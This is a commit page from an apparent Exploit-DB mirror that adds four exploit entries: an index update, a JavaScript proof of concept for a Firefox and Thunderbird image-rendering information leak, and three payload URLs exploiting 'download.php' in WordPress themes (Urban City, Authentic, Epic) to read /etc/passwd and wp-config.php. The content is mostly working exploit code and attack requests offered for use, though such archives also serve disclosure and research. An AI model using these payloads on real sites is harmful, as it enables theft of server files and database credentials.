bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-24

Browse source 
4 new exploits
This commit is contained in:
Offensive Security 2016-01-24 05:02:48 +00:00
parent 65e7008d6b
commit 73e749c845
5 changed files with 165 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
files.csv
View file

@ -35535,3 +35535,7 @@ id,file,description,date,author,platform,type,port
39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0
39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0
39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Vulnerability",2014-08-26,"Claudio Viviani",php,webapps,0
39295,platforms/multiple/remote/39295.js,"Mozilla Firefox <= 9.0.1 and Thunderbird <= 3.1.20 Information Disclosure Vulnerability",2014-09-02,"Michal Zalewski",multiple,remote,0
39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0

Can't render this file because it is too large.

140
platforms/multiple/remote/39295.js Executable file
View file

@ -0,0 +1,140 @@
source: http://www.securityfocus.com/bid/69525/info
Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability.
Attackers can exploit this issue to disclose sensitive information that may aid in further attacks.
This issue is fixed in:
Firefox 32
Firefox ESR 31.1
Thunderbird 31.1
<style>
body {
background-color: #d0d0d0;
}
img {
border: 1px solid teal;
margin: 1ex;
}
canvas {
border: 1px solid crimson;
margin: 1ex;
}
</style>
<body onload="set_images()">
<div id="status">
</div>
<div id="image_div">
</div>
<canvas height=32 width=32 id=cvs>
</canvas>
<h2>Variants:</h2>
<ul id="output">
</ul>
<script>
var c = document.getElementById('cvs');
var ctx = c.getContext('2d');
var loaded = 0;
var image_obj = [];
var USE_IMAGES = 300;
function check_results() {
var uniques = [];
uniques.push(image_obj[0].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[0].imgdata + '">';
for (var i = 1; i < USE_IMAGES; i++) {
if (image_obj[0].imgdata != image_obj[i].imgdata) {
for (var j = 1; j < uniques.length; j++)
if (uniques[j] == image_obj[i].imgdata) break;
if (j == uniques.length) {
uniques.push(image_obj[i].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[i].imgdata + '">';
}
}
}
if (uniques.length > 1)
alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
else
alert('The image has just one variant when rendered. You\'re probably OK.');
}
function count_image() {
loaded++;
ctx.clearRect(0, 0, 32, 32);
try {
ctx.drawImage(this, 0, 0, 32, 32);
} catch (e) { }
this.imgdata = c.toDataURL();
if (loaded == USE_IMAGES) check_results();
}
function set_images() {
loaded = 0;
create_images();
for (var i = 0; i < USE_IMAGES; i++)
image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();
}
function create_images() {
for (var i = 0; i < USE_IMAGES; i++) {
image_obj[i] = new Image();
image_obj[i].height = 32;
image_obj[i].width = 32;
image_obj[i].onerror = count_image;
image_obj[i].onload = count_image;
document.getElementById('image_div').appendChild(image_obj[i]);
}
}
</script>
<iframe src='http://www.example.com/'></iframe>

7
platforms/php/webapps/39296.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/69670/info
Urban City theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd

7
platforms/php/webapps/39297.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/69671/info
Authentic theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php

7
platforms/php/webapps/39298.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/69672/info
Epic theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php